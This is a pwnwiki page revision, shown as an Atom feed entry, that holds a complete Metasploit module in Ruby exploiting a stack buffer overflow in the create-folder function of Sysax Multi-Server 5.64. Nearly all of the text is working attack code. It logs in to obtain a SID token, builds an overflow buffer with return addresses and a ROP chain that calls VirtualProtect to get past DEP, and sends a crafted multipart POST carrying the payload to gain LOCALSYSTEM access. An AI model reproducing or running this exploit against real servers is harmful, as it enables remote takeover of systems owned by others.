https://pwnwiki.com/index.php?action=history&feed=atom&title=Sysax_Multi-Server_5.64_Create_Folder_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E 2026-04-11T09:19:35Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=Sysax_Multi-Server_5.64_Create_Folder_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=3283&oldid=prev 2021-05-26T01:08:28Z

<p>Created page with &quot;==EXP== &lt;pre&gt; require &#039;msf/core&#039; require &#039;base64&#039; class Metasploit3 &lt; Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(i...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> require 'msf/core'<br /> require 'base64'<br /> <br /> class Metasploit3 &lt; Msf::Exploit::Remote<br /> Rank = NormalRanking<br /> <br /> include Msf::Exploit::Remote::HttpClient<br /> <br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' =&gt; 'Sysax Multi Server 5.64 Create Folder BoF',<br /> 'Description' =&gt; %q{<br /> This module exploits a stack buffer overflow in the create folder function<br /> in Sysax Multi Server 5.64. This issue was fixed in 5.66.<br /> <br /> You must have valid credentials to trigger the vulnerability. Your credentials<br /> must also have the create folder permission and the HTTP option has to be enabled.<br /> This module will log into the server, get your a SID token and then proceed to exploit<br /> the server. Successful exploits result in LOCALSYSTEM access. This exploit works on<br /> XP SP3, and Server 2003 SP1-SP2.<br /> },<br /> 'License' =&gt; MSF_LICENSE,<br /> 'Author' =&gt;<br /> [<br /> 'Matt Andreko @mandreko', # discovery &amp; Metasploit module for 5.64<br /> 'Craig Freyman @cd1zz', # original discovery &amp; Metasploit module for 5.50<br /> ],<br /> 'Version' =&gt; '$Revision:$',<br /> 'References' =&gt;<br /> [<br /> [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], # 5.64 update<br /> [ 'URL', 'http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html' ], # 5.50 post<br /> ],<br /> 'DefaultOptions' =&gt;<br /> {<br /> 'EXITFUNC' =&gt; 'process',<br /> },<br /> 'Platform' =&gt; 'win',<br /> 'Payload' =&gt;<br /> {<br /> 'BadChars' =&gt; &quot;\x00\x2F&quot;,<br /> },<br /> <br /> 'Targets' =&gt;<br /> [<br /> [ 'Windows XP SP3',<br /> {<br /> 'Rop' =&gt; false,<br /> 'Ret' =&gt; 0x77c35459, # push esp # ret [sysaxd.exe]<br /> 'Offset' =&gt; 701,<br /> }<br /> ],<br /> [ 'Windows 2003 SP1-SP2 DEP &amp; ASLR Bypass',<br /> {<br /> 'Rop' =&gt; true,<br /> 'Ret' =&gt; 0x77baf605, # pivot<br /> 'Offset' =&gt; 701,<br /> 'Nop' =&gt; 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll]<br /> }<br /> ],<br /> ],<br /> 'Privileged' =&gt; false,<br /> 'DisclosureDate'=&gt; 'July 29, 2012',<br /> 'DefaultTarget' =&gt; 0))<br /> <br /> register_options(<br /> [<br /> OptString.new('URI', [false, &quot;URI for Multi Server&quot;, '/']),<br /> Opt::RPORT(80),<br /> OptString.new('SysaxUSER', [ true, &quot;Username&quot; ]),<br /> OptString.new('SysaxPASS', [ true, &quot;Password&quot; ])<br /> ], self.class)<br /> <br /> end<br /> <br /> def target_url<br /> &quot;http://#{rhost}:#{rport}#{datastore['URI']}&quot;<br /> end<br /> <br /> def create_rop_chain()<br /> rop_gadgets = []<br /> # All rop gadgets generated by mona.py<br /> # Thanks corelanc0d3r for making such a great tool<br /> <br /> if (target == targets[1]) # Windows 2003<br /> rop_gadgets =<br /> [<br /> 0x77be3adb, # POP EAX # RETN [msvcrt.dll]<br /> 0x77ba1114, # ptr to &amp;VirtualProtect() [IAT msvcrt.dll]<br /> 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll]<br /> 0x41414141, # Filler (compensate)<br /> 0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll]<br /> 0x77bdb896, # POP EBP # RETN [msvcrt.dll]<br /> 0x77be2265, # &amp; push esp # ret [msvcrt.dll]<br /> 0x77bdeebf, # POP EAX # RETN [msvcrt.dll]<br /> 0x2cfe0668, # put delta into eax (-&gt; put 0x00000201 into ebx)<br /> 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]<br /> 0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll]<br /> 0x77bdf0da, # POP EAX # RETN [msvcrt.dll]<br /> 0x2cfe04a7, # put delta into eax (-&gt; put 0x00000040 into edx)<br /> 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]<br /> 0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll]<br /> 0x77bcc2ee, # POP ECX # RETN [msvcrt.dll]<br /> 0x77befbb4, # &amp;Writable location [msvcrt.dll]<br /> 0x77bbf75e, # POP EDI # RETN [msvcrt.dll]<br /> 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll]<br /> 0x77bdf0da, # POP EAX # RETN [msvcrt.dll]<br /> 0x90909090, # nop<br /> 0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]<br /> ].flatten.pack(&quot;V*&quot;)<br /> end<br /> <br /> return rop_gadgets<br /> <br /> end<br /> <br /> def exploit<br /> <br /> user = datastore['SysaxUSER']<br /> pass = datastore['SysaxPASS']<br /> <br /> #base64 encode the credentials<br /> encodedcreds = Base64.encode64(user+&quot;\x0a&quot;+pass)<br /> creds = &quot;fd=&quot;+encodedcreds<br /> <br /> connect<br /> <br /> # Login to get SID value<br /> print_status &quot;Getting SID from #{target_url}&quot;<br /> res = send_request_raw({<br /> 'method'=&gt; 'POST',<br /> 'uri' =&gt; &quot;#{target_url}/scgi?sid=0&amp;pid=dologin&quot;,<br /> 'data' =&gt; creds<br /> },20)<br /> <br /> #parse response for SID token<br /> sid = res.body.match (/(sid=[A-Z0-9a-z]{40})/)<br /> print_status &quot;Your &quot; + sid.to_s<br /> <br /> buffer = rand_text(target['Offset'])<br /> buffer &lt;&lt; [target.ret].pack('V')<br /> <br /> if (target['Rop'])<br /> buffer &lt;&lt; [target['Nop']].pack('V')*16<br /> buffer &lt;&lt; create_rop_chain()<br /> end<br /> <br /> buffer &lt;&lt; make_nops(15)<br /> buffer &lt;&lt; payload.encoded #max 1299 bytes<br /> <br /> #pwnag3 post data<br /> post_data = &quot;scgi?&quot;+sid.to_s+&quot;&amp;pid=mk_folder2_name1.htm HTTP/1.1\r\n&quot;<br /> post_data &lt;&lt; &quot;Content-Length: 171\r\n\r\n&quot;<br /> post_data &lt;&lt; &quot;-----------------------------1190753071675116720811342231\r\n&quot;<br /> post_data &lt;&lt; &quot;Content-Disposition: form-data; name=\&quot;e2\&quot;\r\n\r\n&quot;<br /> post_data &lt;&lt; buffer+&quot;\r\n&quot;<br /> post_data &lt;&lt; &quot;-----------------------------1190753071675116720811342231--\r\n\r\n&quot;<br /> <br /> referer = &quot;http://&quot;+datastore['RHOST'].to_s+&quot;/scgi?&quot;+sid.to_s+&quot;&amp;pid=mk_folder1_name1.htm&quot;<br /> <br /> send_request_raw({<br /> 'uri' =&gt; &quot;/&quot; + post_data,<br /> 'version' =&gt; '1.1',<br /> 'method' =&gt; 'POST',<br /> 'referer' =&gt; referer<br /> })<br /> <br /> handler<br /> disconnect<br /> <br /> end<br /> end<br /> &lt;/pre&gt;</div>

Pwnwiki